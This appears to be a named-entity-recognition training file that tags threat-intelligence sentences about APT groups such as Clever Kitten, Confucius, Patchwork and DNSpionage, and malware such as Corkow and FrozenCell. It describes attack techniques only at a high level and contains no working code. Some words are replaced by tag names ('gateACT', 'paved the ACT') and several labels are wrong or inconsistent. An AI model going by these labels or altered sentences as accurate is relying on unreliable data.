O + +Most O +modules O +were O +created O +in O +2012 S-TIME +. O + +The O +attackers O +began O +taking O +them O +offline O +in O +January B-TIME +2014 E-TIME +. O + +Last O +week O +we O +discussed O +Numbered B-APT +Panda E-APT +, O +a O +group O +that O +is O +also O +based O +out O +of O +China S-LOC +and O +is O +fairly O +well O +known O +to O +the O +security B-SECTEAM +community E-SECTEAM +, O +though O +by O +many O +names O +. O + +We O +revealed O +a O +Chinese-based S-LOC +adversary O +we O +crypt O +as O +Anchor B-APT +Panda E-APT +, O +a O +group O +with O +very O +specific O +tactics O +, O +techniques O +, O +and O +procedures O +( O +TTPs O +) O +and O +a O +keen O +interest O +in O +maritime O +operations O +and O +naval S-IDTY +and O +aerospace B-IDTY +technology E-IDTY +. O + +The O +campaign O +was O +active O +until O +January B-TIME +2014 E-TIME +, O +but O +during O +our O +investigations O +the O +C&C S-TOOL +servers O +were O +shut O +down O +. O + +This O +week O +we O +are O +going O +to O +discuss O +Clever O +Kitten O +, O +whom O +, O +by O +virtue O +of O +several O +indicators O +, O +we O +have O +affiliated O +with O +the O +Islamic B-LOC +Republic I-LOC +of I-LOC +Iran E-LOC +. O + +Clever B-APT +Kitten E-APT +has O +moved O +to O +leveraging O +strategic B-ACT +web I-ACT +compromises E-ACT +. O + +Clever B-APT +Kitten E-APT +actors O +have O +a O +strong O +affinity O +for O +PHP O +server-side O +attacks O +to O +make O +access O +; O +this O +is O +relatively O +unique O +amongst O +targeted O +attackers O +who O +often O +favor O +targeting O +a O +specific O +individual S-IDTY +at O +a O +specific O +organization O +using O +social B-IDTY +engineering E-IDTY +. O + +Clever B-APT +Kitten E-APT +primarily O +targets O +global O +companies O +with O +strategic O +importance O +to O +countries O +that O +are O +contrary O +to O +Iranian O +interests O +. 
O + +A O +Clever B-APT +Kitten E-APT +attack O +starts O +with O +the O +use O +of O +a O +web B-MAL +vulnerability I-MAL +scanner E-MAL +to O +conduct O +reconnaissance O +. O + +The O +scanner O +was O +identified O +as O +the O +Acunetix B-FILE +Web I-FILE +Vulnerability I-FILE +Scanner E-FILE +which O +is O +a O +commercial O +penetration O +testing O +tool O +that O +is O +readily O +available O +as O +a O +14-day O +trial O +. O + +Once O +an O +exploitable O +page O +is O +identified O +, O +Clever O +Kitten O +will O +attempt O +to O +upload O +a O +PHP O +backdoor O +to O +gain O +remote O +access O +to O +the O +system O +. O + +The O +reason O +for O +this O +is O +likely O +the O +availability O +of O +exploits O +against O +web O +browsers O +, O +which O +for O +a O +variety O +of O +reasons O +allows O +an O +attacker O +to O +bypass O +security O +features O +such O +as O +Data B-TOOL +Execution I-TOOL +Prevention E-TOOL +( O +DEP S-TOOL +) O +or O +Address B-TOOL +Space I-TOOL +Layout I-TOOL +Randomization E-TOOL +( O +ASLR S-TOOL +) O +. O + +Once O +an O +exploitable O +page O +is O +identified O +, O +the O +actor O +will O +attempt O +to O +upload O +a O +PHP O +backdoor O +to O +gain O +remote O +access O +to O +the O +system O +. O + +In O +Clever O +Kitten O +'s O +attacks O +, O +the O +goal O +is O +lateral O +movement O +; O +this O +is O +an O +attempt O +to O +move O +further O +into O +the O +target O +environment O +in O +order O +to O +begin O +intelligence O +collection O +. O + +This O +activity O +is O +a O +longer O +tail O +for O +the O +actor O +than O +a O +spearphish S-ACT +; O +this O +is O +likely O +based O +on O +the O +Clever O +Kitten O +background O +, O +which O +may O +be O +focused O +on O +web O +development/application O +testing O +. 
O + +Without O +going O +too O +deep O +into O +the O +rabbit O +hole O +, O +there O +are O +several O +indicators O +pointing O +to O +an O +Iranian O +nexus O +, O +including O +language O +artifacts O +in O +the O +tool-marks O +used O +by O +the O +attacker O +, O +as O +well O +as O +network B-ACT +activity E-ACT +tying O +this O +actor O +to O +a O +very O +specific O +location O +that O +we O +have O +high O +confidence O +in O +not O +being O +spoofed O +. O + +Clever B-APT +Kitten E-APT +'s O +goal O +is O +to O +eventually O +be O +able O +to O +masquerade O +as O +a O +legitimate O +user O +by O +compromising O +credentials O +either O +through O +a O +pass-the-hash B-ACT +attack E-ACT +, O +or O +by O +dumping O +password O +hashes O +from O +a O +compromised O +host O +. O + +The O +campaign O +targets O +Middle B-LOC +Eastern E-LOC +organizations O +largely O +from O +the O +Lebanon S-LOC +and O +United S-LOC +Arab S-IDTY +Emirates S-IDTY +, O +though O +, O +Indian S-LOC +and O +Canadian S-LOC +companies O +with O +interests O +in O +those O +Middle B-LOC +Eastern E-LOC +countries O +are O +also O +targeted O +. O + +There O +are O +new O +TTPs O +used O +in O +this O +attack O +– O +for O +example O +Agent_Drable O +is O +leveraging O +the O +Django S-MAL +Python S-TOOL +framework O +for O +command O +and O +control O +infrastructure O +, O +the O +technical O +details O +of O +which O +are O +outlined O +later O +in O +the O +blog O +. O + +n O +summary O +, O +Cold O +River O +is O +a O +sophisticated O +threat O +actor O +making O +malicious O +use O +of O +DNS B-MAL +tunneling E-MAL +for O +command B-ACT +and I-ACT +control I-ACT +activities E-ACT +, O +compelling O +lure O +documents O +, O +and O +previously O +unknown O +implants O +. 
O + +Some O +of O +the O +exploit S-VULNAME +server O +paths O +contain O +modules O +that O +appear O +to O +have O +been O +designed O +to O +infect O +Linux S-OS +computers O +, O +but O +we O +have O +not O +yet O +located O +the O +Linux S-OS +backdoor O +. O + +The O +campaign O +targets O +Middle O +Eastern O +organizations O +largely O +from O +the O +Lebanon S-LOC +and O +United S-LOC +Arab B-IDTY +Emirates E-IDTY +, O +though O +, O +Indian S-LOC +and O +Canadian S-LOC +companies O +with O +interests O +in O +those O +Middle B-LOC +Eastern E-LOC +countries O +may O +have O +also O +been O +targeted O +. O + +The O +decoy B-MAL +documents E-MAL +used O +by O +the O +InPage S-TOOL +exploits S-VULNAME +suggest O +that O +the O +targets O +are O +likely O +to O +be O +politically S-IDTY +or O +militarily S-IDTY +motivated O +. O + +The O +use O +of O +InPage S-MAL +as O +an O +attack O +vector O +is O +not O +commonly O +seen O +, O +with O +the O +only O +previously O +noted O +attacks O +being O +documented O +by O +Kaspersky S-SECTEAM +in O +late B-TIME +2016 E-TIME +. O + +The O +decoy B-FILE +documents E-FILE +dropped O +suggest O +that O +the O +targets O +are O +likely O +to O +be O +politically S-IDTY +or O +militarily S-IDTY +motivated O +, O +with O +subjects O +such O +as O +Intelligence O +reports O +and O +political S-IDTY +situations O +being O +used O +as O +lure O +documents O +. O + +While O +documents O +designed O +to O +exploit S-VULNAME +the O +InPage B-MAL +software E-MAL +are O +rare O +, O +they O +are O +not O +new O +– O +however O +in O +recent O +weeks O +Unit42 S-SECTEAM +has O +observed O +numerous O +InPage S-TOOL +exploits S-VULNAME +leveraging O +similar O +shellcode O +, O +suggesting O +continued O +use O +of O +the O +exploit S-VULNAME +previously O +discussed O +by O +Kaspersky S-SECTEAM +. 
O + +Confucius O +targeted O +a O +particular O +set O +of O +individuals O +in O +South O +Asian O +countries O +, O +such O +as O +military B-IDTY +personnel E-IDTY +and O +businessmen S-IDTY +, O +among O +others O +. O + +Tweety B-MAL +Chat E-MAL +'s O +Android S-OS +version O +can O +record O +audio O +, O +too O +. O + +Confucius' O +operations O +include O +deploying O +bespoke O +backdoors O +and O +stealing O +files O +from O +their O +victim O +'s O +systems O +with O +tailored O +file O +stealers O +, O +some O +of O +which O +bore O +resemblances O +to O +Patchwork S-APT +'s O +. O + +Compared O +to O +Patchwork S-APT +, O +whose O +Trojanized O +documents O +exploit S-VULNAME +at O +least O +five O +security O +flaws O +, O +Confucius' O +backdoors O +are O +delivered O +through O +Office O +files O +exploiting O +memory O +corruption O +vulnerabilities O +CVE-2015-1641 S-VULID +and O +CVE-2017-11882 S-VULID +. O + +Back O +in O +February O +, O +we O +noted O +the O +similarities O +between O +the O +Patchwork S-APT +and O +Confucius B-APT +groups E-APT +and O +found O +that O +, O +in O +addition O +to O +the O +similarities O +in O +their O +malware O +code O +, O +both O +groups O +primarily O +went O +after O +targets O +in O +South B-LOC +Asia E-LOC +. O + +Back O +in O +February S-TIME +, O +Trend B-SECTEAM +Micro E-SECTEAM +noted O +the O +similarities O +between O +the O +Patchwork S-APT +and O +Confucius B-APT +groups E-APT +and O +found O +that O +, O +in O +addition O +to O +the O +similarities O +in O +their O +malware O +code O +, O +both O +groups O +primarily O +went O +after O +targets O +in O +South S-LOC +Asia S-LOC +. O + +One O +of O +its O +file O +stealers O +, O +swissknife2 S-MAL +, O +abuses O +a O +cloud O +storage O +service O +as O +a O +repository O +of O +exfiltrated O +files O +. 
O + +During O +the O +months O +that O +followed O +in O +which O +we O +tracked O +Confucius' B-ACT +activities E-ACT +, O +we O +found O +that O +they O +were O +still O +aiming O +for O +Pakistani O +targets O +. O + +During O +their O +previous O +campaign O +, O +we O +found O +Confucius O +using O +fake O +romance O +websites O +to O +entice O +victims O +into O +installing O +malicious O +Android S-OS +applications O +. O + +Periodically O +, O +the O +malware O +tries O +to O +contact O +the O +command-and-control S-TOOL +( O +C&C S-TOOL +) O +server O +with O +the O +username O +encoded O +into O +parameters O +. O + +This O +function O +is O +similar O +to O +the O +various O +versions O +of O +backdoors O +( O +such O +as O +sctrls S-MAL +and O +sip_telephone S-MAL +) O +that O +we O +analyzed O +in O +our O +previous O +blog O +post O +and O +whitepaper O +. O + +This O +algorithm O +was O +previously O +discussed O +by O +security O +researchers O +in O +a O +Confucius-related O +blog O +post O +. O + +Lately O +, O +Patchwork S-APT +has O +been O +sending O +multiple O +RTF B-FILE +files E-FILE +exploiting O +CVE-2017-8570 S-VULID +. O + +The O +group O +still O +uses O +the O +Badnews S-MAL +malware S-MAL +, O +a O +backdoor O +with O +information-stealing O +and O +file-executing O +capabilities O +, O +albeit O +updated O +with O +a O +slight O +modification O +in O +the O +encryption O +routine O +at O +the O +end O +of O +2017 S-TIME +, O +when O +they O +added O +Blowfish O +encryption O +on O +top O +of O +their O +custom O +encryption O +described O +in O +our O +former O +Patchwork S-APT +blogpost O +. 
O + +Threat O +actors O +like O +Confucius S-APT +and O +Patchwork S-APT +are O +known O +for O +their O +large O +arsenal O +of O +tools O +and O +ever-evolving O +techniques O +that O +can O +render O +traditional O +security O +solutions O +— O +which O +are O +often O +not O +designed O +to O +handle O +the O +persistent O +and O +sophisticated O +threats O +detailed O +in O +this O +blog O +— O +ineffective O +. O + +The O +reality O +is O +that O +IT B-IDTY +departments E-IDTY +of O +small O +to O +large-sized O +organizations O +are O +not O +equipped O +to O +handle O +the O +more O +advanced O +threats O +that O +groups O +like O +Confucius O +use O +in O +their O +attacks O +. O + +Patchwork S-APT +uses O +email S-ACT +as O +an O +entry O +point O +, O +which O +is O +why O +securing O +the O +email B-ACT +gateACT E-ACT +is O +important O +. O + +This O +blog O +post O +examines O +two O +similar O +malware O +families O +that O +utilize O +the O +aforementioned O +technique O +to O +abuse O +legitimate O +websites O +, O +their O +connections O +to O +each O +other O +, O +and O +their O +connections O +to O +known O +espionage B-ACT +campaigns E-ACT +. O + +In O +order O +to O +increase O +the O +likelihood O +of O +their O +malware O +successfully O +communicating O +home O +, O +Cyber B-ACT +Espionage E-ACT +threat O +actors O +are O +increasingly O +abusing B-ACT +legitimate I-ACT +web I-ACT +services E-ACT +, O +in O +lieu O +of O +DNS B-ACT +lookups E-ACT +to O +retrieve O +a O +command O +and O +control O +address O +. O + +In O +2013 S-TIME +, O +Rapid7 S-SECTEAM +reported O +on O +a O +series O +of O +relatively O +amateur O +attacks O +against O +Pakistani O +targets O +. 
O + +The O +first O +of O +which O +we O +call O +' O +CONFUCIUS_A S-FILE +' O +, O +a O +malware O +family O +that O +has O +links O +to O +a O +series O +of O +attacks O +associated O +with O +a O +backdoor B-ACT +attack E-ACT +method O +commonly O +known O +as O +SNEEPY S-MAL +( O +aka O +ByeByeShell S-MAL +) O +first O +reported O +by O +Rapid7 S-SECTEAM +in O +2013 S-TIME +. O + +At O +first O +glance O +CONFUCIUS_B S-FILE +looks O +very O +similar O +to O +CONFUCIUS_A S-FILE +, O +and O +they O +are O +also O +packaged O +in O +plain O +SFX B-MAL +binary I-MAL +files E-MAL +. O + +The O +CONFUCIUS_B S-FILE +executable O +is O +disguised O +as O +a O +PowerPoint O +presentation O +, O +using O +a O +Right-To-Left-Override S-TOOL +( O +RTLO S-TOOL +) O +trick O +and O +a O +false O +icon O +. O + +We O +also O +believe O +that O +both O +clusters O +of O +activity O +have O +links O +to O +attacks O +with O +likely O +Indian O +origins O +, O +the O +CONFUCIUS_A B-ACT +attacks E-ACT +are O +linked O +to O +the O +use O +of O +SNEEPY/BYEBYESHELL S-MAL +and O +the O +CONFUCIUS_B S-FILE +have O +a O +loose O +link O +to O +Hangover S-MAL +. O + +The O +two O +malware O +families O +themselves O +are O +also O +very O +similar O +, O +and O +therefore O +we O +think O +that O +the O +shared O +technique O +is O +an O +indication O +of O +a O +single O +developer O +, O +or O +development B-IDTY +company E-IDTY +, O +behind O +both O +CONFUCIUS_A S-FILE +and O +CONFUCIUS_B S-FILE +. O + +In O +this O +blog O +post O +, O +we O +discussed O +two O +separate O +malware O +variations O +that O +behave O +in O +very O +similar O +ACTs O +and O +use O +similar O +techniques O +to O +acquire O +a O +C2 S-TOOL +address O +, O +with O +both O +using O +Yahoo O +Answers O +and O +Quora O +to O +evade O +traditional O +mechanisms O +for O +blocking O +command O +and O +control O +domains O +. 
O + +The O +Android B-FILE +version E-FILE +, O +for O +instance O +, O +can O +steal O +SMS O +messages O +, O +accounts O +, O +contacts O +, O +and O +files O +, O +as O +well O +as O +record O +audio O +. O + +Confucius' B-MAL +backdoors E-MAL +are O +delivered O +through O +Office O +documents O +exploiting O +memory O +corruption O +vulnerabilities O +CVE-2015-1641 S-VULID +and O +CVE-2017-11882 S-VULID +. O + +We O +dove O +deeper O +into O +Confucius' O +operations—namely O +, O +the O +malware-ridden O +documents O +, O +backdoors O +, O +and O +file O +stealers O +they O +use O +in O +their O +campaigns S-ACT +. O + +The O +sctrls B-MAL +backdoor E-MAL +we O +came O +across O +is O +delivered O +via O +RTF B-ACT +files E-ACT +exploiting O +CVE-2015-1641 S-VULID +. O + +The O +documents O +that O +exploit S-VULNAME +CVE2017-11882 S-VULID +download O +another O +payload O +— O +an O +HTML B-TOOL +Application E-TOOL +( O +HTA S-TOOL +) O +file O +toting O +a O +malicious O +Visual B-TOOL +Basic E-TOOL +( O +VBS S-TOOL +) O +script O +— O +from O +the O +server O +, O +which O +is O +executed O +accordingly O +by O +the O +command-line O +tool O +mshta.exe S-FILE +. O + +In O +August B-TIME +2015 E-TIME +a O +new O +incident O +related O +to O +the O +Corkow S-MAL +( O +Metel S-APT +) O +Trojan S-MAL +was O +detected O +. O + +Corkow S-MAL +provided O +remote B-ACT +access E-ACT +to O +the O +ITS-Broker O +system O +terminal O +by O +《 O +Platforma O +soft O +》 O +Ltd. O +, O +which O +enabled O +the O +fraud O +to O +be O +committed O +. O + +According O +to O +our O +statistics O +, O +as O +of O +the O +beginning O +of O +2015 S-TIME +this O +botnet B-FILE +encompassed E-FILE +over O +250 O +000 O +infected O +devices O +worldwide O +including O +infecting O +more O +than O +100 O +financial B-IDTY +institutions E-IDTY +with O +80% O +of O +them O +from O +the O +top O +20 O +list O +. 
O + +The O +interest O +among O +hackers O +in O +targeting O +trading O +systems O +is O +expected O +to O +grow O +. O + +Russian-speaking S-LOC +hackers O +are O +believed O +to O +be O +responsible O +for O +these O +attacks O +and O +used O +the O +Corkow B-MAL +Trojan E-MAL +. O + +Hackers O +target O +primarily B-IDTY +companies E-IDTY +in O +Russia O +and O +CIS O +countries O +, O +though O +it O +is O +noticed O +that O +the O +amount O +of O +attacks O +targeting O +the O +USA O +has O +increased O +5 O +times O +since O +2011 S-TIME +. O + +One O +of O +the O +first O +botnets O +specializing O +in O +targeting O +the O +trading O +software O +called O +Quik S-MAL +was O +" O +Ranbyus S-MAL +" O +, O +created O +in O +2012 S-TIME +. O + +As O +of O +the O +Group-IB S-SECTEAM +investigation O +of O +this O +malware O +program O +in O +March B-TIME +2015 E-TIME +, O +Corkow S-MAL +v.7.118.1.1 O +had O +not O +been O +detected O +by O +a O +single O +antivirus O +program O +. O + +Hackers O +gained O +access O +to O +a O +computer O +in O +the O +trading O +system O +in O +September B-TIME +2014 E-TIME +. O + +Starting O +in O +December O +2014 O +, O +the O +criminal O +group O +began O +running O +keyloggers S-MAL +in O +the O +infected O +system O +. O + +To O +spread O +the O +Corkow O +malware O +criminals O +use O +a O +drive-by O +downloads O +method O +, O +when O +victims O +are O +infected O +while O +visiting O +compromised O +legitimate O +websites O +. O + +Group-IB S-SECTEAM +specialists O +detected O +various O +sites O +used O +by O +criminals O +to O +spread O +the O +Trojan S-MAL +: O +mail B-MAL +tracking I-MAL +websites E-MAL +, O +news B-MAL +portals E-MAL +, O +electronic B-MAL +books E-MAL +, O +computer B-MAL +graphics I-MAL +resources E-MAL +, O +music B-MAL +portals E-MAL +, O +etc O +. 
O + +Hackers O +use O +the O +exploits O +" O +Nitris B-VULNAME +Exploit I-VULNAME +Kit E-VULNAME +" O +( O +earlier O +known O +as O +CottonCastle S-VULNAME +) O +, O +which O +is O +not O +available O +in O +open O +sources O +and O +sold O +only O +to O +trusted O +users O +. O + +Group-IB S-SECTEAM +Bot-trek O +TDS O +sensors O +are O +in O +place O +at O +a O +number O +of O +financial B-IDTY +institutions E-IDTY +and O +, O +unfortunately O +, O +we O +register O +that O +currently O +Corkow S-MAL +malware S-MAL +is O +present O +on O +80% O +of O +protected O +corporate O +systems O +. O + +Considering O +the O +Trojan S-MAL +delivery O +method O +and O +through O +our O +analysis O +of O +infections O +on O +banks' O +networks O +, O +we O +can O +confirm O +that O +all O +infections O +were O +conducted O +on O +a O +random O +basis O +. O + +According O +to O +statistics O +, O +Corkow S-MAL +primarily O +targets O +users S-IDTY +in O +Russia O +and O +the O +CIS O +, O +but O +it O +is O +worth O +noting O +that O +in O +2014 S-TIME +the O +amount O +of O +attacks O +targeting O +the O +USA O +increased O +by O +5 O +times O +, O +in O +comparison O +with O +2011 S-TIME +. O + +Moreover O +, O +the O +number O +of O +Corkow S-MAL +incidents O +detected O +in O +Q1 O +2015 S-TIME +in O +the O +United O +States O +exceeds O +the O +number O +of O +those O +in O +the O +CIS O +countries O +. O + +Moreover O +, O +the O +number O +of O +Corkow S-MAL +incidents O +detected O +in O +Q1 O +2015 S-TIME +in O +the O +United B-LOC +States E-LOC +exceeds O +the O +number O +of O +those O +in O +the O +CIS O +countries O +. O + +Hackers O +first O +actively O +spread O +bots O +using O +the O +Niteris S-TOOL +exploit S-VULNAME +, O +and O +then O +search O +for O +infected O +devices O +at O +banks S-IDTY +amongst O +their O +bots O +by O +analyzing O +IP S-PROT +addresses O +, O +cracked O +passwords O +and O +results O +of O +the O +modules O +performance O +. 
O + +In O +addition O +to O +the O +legitimate O +AmmyAdmin B-MAL +tool E-MAL +, O +the O +hackers O +used O +Visconti B-MAL +Backdoor E-MAL +developed O +based O +on O +legitimate O +RMS S-TOOL +( O +remote B-TOOL +manipulator I-TOOL +system E-TOOL +) O +software O +. O + +If O +a O +bot S-FILE +was O +installed O +on O +a O +network O +that O +was O +of O +interest O +to O +the O +hacking O +group O +, O +this O +bot O +was O +then O +used O +to O +upload O +one O +of O +the O +remote O +access O +programs O +. O + +To O +obtain O +logins O +and O +passwords O +they O +applied O +keyloggers S-MAL +built O +into O +Corkow S-MAL +, O +as O +well O +as O +a O +commonly O +used O +feature O +of O +Mimikatz O +, O +dumping O +clear O +text O +Windows S-OS +credentials O +from O +LSA O +. O + +Hackers O +used O +the O +remote B-ACT +access E-ACT +to O +detect O +servers O +of O +their O +interest O +in O +the O +internal O +network O +. O + +In O +2015 S-TIME +, O +the O +Metel O +gang O +began O +to O +target O +banks S-IDTY +and O +financial B-IDTY +institutions E-IDTY +directly O +. O + +Metel S-MAL +is O +a O +banking S-IDTY +Trojan S-MAL +( O +also O +known O +as O +Corkow S-MAL +) O +discovered O +in O +2011 S-TIME +when O +it O +was O +used O +to O +attack O +users O +of O +online O +banking O +services O +. O + +After O +the O +infection O +stage O +, O +criminals O +move O +laterally O +with O +the O +help O +of O +legitimate O +and O +pentesting O +tools O +, O +stealing O +passwords O +from O +their O +initial O +victims O +( O +entry O +point O +) O +to O +gain O +access O +to O +the O +computers O +within O +the O +organization O +that O +have O +access O +to O +money O +transactions O +. O + +With O +this O +level O +of O +access O +, O +the O +gang O +has O +been O +able O +to O +pull O +off O +a O +clever O +trick O +by O +automating O +the O +rollback B-ACT +of I-ACT +ATM I-ACT +transactions E-ACT +. 
O + +COVELLITE O +operates O +globally O +with O +targets O +primarily O +in O +Europe S-LOC +, O +East B-LOC +Asia E-LOC +, O +and O +North B-LOC +America E-LOC +. O + +US S-LOC +targets O +emerged O +in O +September B-TIME +2017 E-TIME +with O +a O +small O +, O +targeted O +phishing B-ACT +campaign E-ACT +directed O +at O +select O +U.S. S-LOC +electric B-IDTY +companies E-IDTY +. O + +LAZARUS O +GROUP O +is O +responsible O +for O +attacks O +ranging O +from O +the O +2014 S-TIME +attack O +on O +Sony B-IDTY +Pictures E-IDTY +to O +a O +number O +of O +Bitcoin S-TOOL +heists O +in O +2017 S-TIME +. O + +Technical O +analysis O +of O +COVELLITE S-MAL +malware S-MAL +indicates O +an O +evolution O +from O +known O +LAZARUS B-MAL +toolkits E-MAL +. O + +COVELLITE O +remains O +active O +but O +appears O +to O +have O +abandoned O +North O +American O +targets O +, O +with O +indications O +of O +activity O +in O +Europe S-LOC +and O +East B-LOC +Asia E-LOC +. O + +Given O +the O +group O +'s O +specific O +interest O +in O +infrastructure O +operations O +, O +rapidly O +improving O +capabilities O +, O +and O +history O +of O +aggressive O +targeting O +, O +Dragos S-SECTEAM +considers O +this O +group O +a O +primary O +threat O +to O +the O +ICS B-IDTY +industry E-IDTY +. O + +Delivering O +a O +backdoor O +and O +spyware O +, O +this O +campaign O +was O +designed O +to O +steal O +information O +from O +infected O +systems O +using O +a O +malware O +client O +capable O +of O +filtering O +out O +" O +uninteresting O +" O +files O +, O +and O +spread O +primarily O +via O +a O +targeted O +phishing B-ACT +email E-ACT +usually O +promising O +a O +pornographic O +video O +. O + +Lookout S-SECTEAM +researchers O +have O +discovered O +a O +new O +mobile O +surveillanceware O +family O +, O +FrozenCell S-MAL +. 
O + +The O +threat O +is O +likely O +targeting O +employees S-IDTY +of O +various O +Palestinian S-LOC +government B-IDTY +agencies E-IDTY +, O +security B-IDTY +services E-IDTY +, O +Palestinian O +students S-IDTY +, O +and O +those O +affiliated O +with O +the O +Fatah B-IDTY +political I-IDTY +party E-IDTY +. O + +Delivering O +a O +backdoor O +and O +spyware O +, O +Desert O +Falcons O +'s O +campaign O +was O +designed O +to O +steal O +information O +from O +infected O +systems O +using O +a O +malware O +client O +capable O +of O +filtering O +out O +" O +uninteresting O +" O +files O +, O +and O +spread O +primarily O +via O +a O +targeted O +phishing B-ACT +email E-ACT +usually O +promising O +a O +pornographic O +video O +. O + +FrozenCell S-MAL +is O +the O +mobile O +component O +of O +a O +multi-platform B-ACT +attack E-ACT +we've O +seen O +a O +threat O +actor O +known O +as O +" O +Two-tailed O +Scorpion/APT-C-23 S-APT +" O +, O +use O +to O +spy O +on O +victims O +through O +compromised O +mobile O +devices O +and O +desktops O +. O + +This O +threat O +is O +another O +proof O +point O +that O +attackers O +are O +clearly O +incorporating O +the O +mobile B-MAL +device E-MAL +into O +their O +surveillance B-ACT +campaigns E-ACT +as O +a O +primary O +attack O +vector O +. O + +Desert B-APT +Falcons E-APT +is O +keenly O +aware O +of O +the O +information O +they O +can O +derive O +from O +these O +devices O +and O +are O +using O +multi-stage O +( O +phishing S-ACT ++ O +an O +executable O +) O +, O +multi-platform O +( O +Android S-OS ++ O +desktop O +) O +attacks O +to O +accomplish O +their O +spying O +. O + +FrozenCell B-MAL +masquerades E-MAL +as O +fake O +updates O +to O +chat O +applications O +like O +Facebook S-IDTY +, O +WhatsApp S-IDTY +, O +Messenger S-IDTY +, O +LINE S-IDTY +, O +and O +LoveChat S-IDTY +. 
O + +For O +example O +, O +the O +actors O +behind O +FrozenCell S-MAL +used O +a O +spoofed O +app O +called O +Tawjihi B-MAL +2016 E-MAL +, O +which O +Jordanian S-LOC +or O +Palestinian S-LOC +students S-IDTY +would O +ordinarily O +use O +during O +their O +general O +secondary O +examination O +. O + +It O +appears O +the O +Desert B-APT +Falcons E-APT +sent O +malicious O +executables O +though O +phishing B-ACT +campaigns E-ACT +impersonating O +individuals O +associated O +with O +the O +Palestinian S-LOC +Security O +Services O +, O +the O +General O +Directorate O +of O +Civil O +Defence O +- O +Ministry O +of O +the O +Interior O +, O +and O +the O +7th O +Fateh O +Conference O +of O +the O +Palestinian B-IDTY +National I-IDTY +Liberation I-IDTY +Front E-IDTY +( O +held O +in O +late O +2016 S-TIME +) O +. O + +The O +titles O +and O +contents O +of O +these O +files O +suggest O +that O +the O +actor O +targeted O +individuals O +affiliated O +with O +these O +government B-IDTY +agencies E-IDTY +and O +the O +Fatah B-IDTY +political I-IDTY +party E-IDTY +. O + +We O +believe O +that O +this O +is O +a O +new O +variant O +of O +VAMP S-MAL +, O +indicating O +that O +the O +threat O +actors O +behind O +APT-C-23 S-APT +are O +still O +active O +and O +continuously O +improving O +their O +product O +. O + +VAMP S-MAL +targeted O +various O +types O +of O +data O +from O +the O +phones O +of O +victims O +: O +images O +, O +text O +messages O +, O +contacts O +, O +and O +call O +history O +, O +among O +others O +. O + +Recently O +, O +Trend B-SECTEAM +Micro E-SECTEAM +researchers O +came O +across O +a O +new O +mobile O +malware O +family O +which O +we O +have O +called O +GnatSpy S-MAL +. O + +On O +Nov. 
B-TIME +27 E-TIME +, O +2018 S-TIME +, O +Cisco B-SECTEAM +'s I-SECTEAM +Talos E-SECTEAM +research O +division O +published O +a O +write-up O +outlining O +the O +contours O +of O +a O +sophisticated O +cyber B-ACT +espionage I-ACT +campaign E-ACT +it O +dubbed O +DNSpionage S-ACT +. O + +Talos S-SECTEAM +said O +the O +perpetrators O +of O +DNSpionage S-ACT +were O +able O +to O +steal O +email S-TOOL +and O +other O +login O +credentials O +from O +a O +number O +of O +government S-IDTY +and O +private O +sector O +entities O +in O +Lebanon O +and O +the O +United O +Arab O +Emirates O +by O +hijacking O +the O +DNS S-PROT +servers O +for O +these O +targets O +, O +so O +that O +all O +email S-ACT +and O +virtual B-TOOL +private I-TOOL +networking E-TOOL +( O +VPN S-TOOL +) O +traffic O +was O +redirected O +to O +an O +Internet O +address O +controlled O +by O +the O +attackers O +. O + +Talos S-SECTEAM +reported O +that O +these O +DNS B-ACT +hijacks E-ACT +also O +paved O +the O +ACT O +for O +the O +attackers O +to O +obtain O +SSL O +encryption O +certificates O +for O +the O +targeted O +domains O +( O +webmail.finance.gov.lb S-DOM +) O +, O +which O +allowed O +them O +to O +decrypt O +the O +intercepted O +email S-TOOL +and O +VPN S-TOOL +credentials O +and O +view O +them O +in O +plain O +text O +. O + +That O +changed O +on O +Jan. B-TIME +25 E-TIME +, O +2019 S-TIME +, O +when O +security B-IDTY +firm E-IDTY +CrowdStrike S-SECTEAM +published O +a O +blog O +post O +listing O +virtually O +every O +Internet O +address O +known O +to O +be O +( O +ab O +)used O +by O +the O +espionage B-ACT +campaign E-ACT +to O +date O +. 
O + +Working O +backwards O +from O +each O +Internet O +address O +, O +I O +was O +able O +to O +see O +that O +in O +the O +last O +few O +months O +of O +2018 S-TIME +the O +hackers O +behind O +DNSpionage S-ACT +succeeded O +in O +compromising O +key O +components O +of O +DNS S-PROT +infrastructure O +for O +more O +than O +50 O +Middle B-LOC +Eastern E-LOC +companies S-IDTY +and O +government B-IDTY +agencies E-IDTY +, O +including O +targets O +in O +Albania S-LOC +, O +Cyprus S-LOC +, O +Egypt S-LOC +, O +Iraq S-LOC +, O +Jordan S-LOC +, O +Kuwait S-LOC +, O +Lebanon S-LOC +, O +Libya S-LOC +, O +Saudi S-LOC +Arabia S-LOC +and O +the O +United B-LOC +Arab I-LOC +Emirates E-LOC +. O + +PCH O +is O +a O +nonprofit O +entity O +based O +in O +northern O +California O +that O +also O +manages O +significant O +amounts O +of O +the O +world O +'s O +DNS S-PROT +infrastructure O +, O +particularly O +the O +DNS S-PROT +for O +more O +than O +500 O +top-level O +domains O +and O +a O +number O +of O +the O +Middle B-LOC +East E-LOC +top-level O +domains O +targeted O +by O +DNSpionage S-ACT +. O + +This O +APT O +group O +usually O +carries O +out O +target B-ACT +attacks E-ACT +against O +government B-IDTY +agencies E-IDTY +to O +steal O +sensitive O +information O +. O + +In O +addition O +to O +spreading O +malware O +via O +spear B-ACT +fishing I-ACT +email E-ACT +with O +Office B-ACT +attachment E-ACT +containing O +either O +vulnerability O +or O +malicious O +macro O +, O +this O +group O +is O +particularly O +good O +at O +leveraging O +malicious O +Android B-MAL +APKs E-MAL +in O +the O +target B-ACT +attacks E-ACT +. O + +We O +named O +the O +actor O +DustSquad S-APT +and O +have O +provided O +private O +intelligence O +reports O +to O +our O +customers O +on O +four O +of O +their O +campaigns S-ACT +involving O +custom O +Android S-OS +and O +Windows S-MAL +malware S-MAL +. 
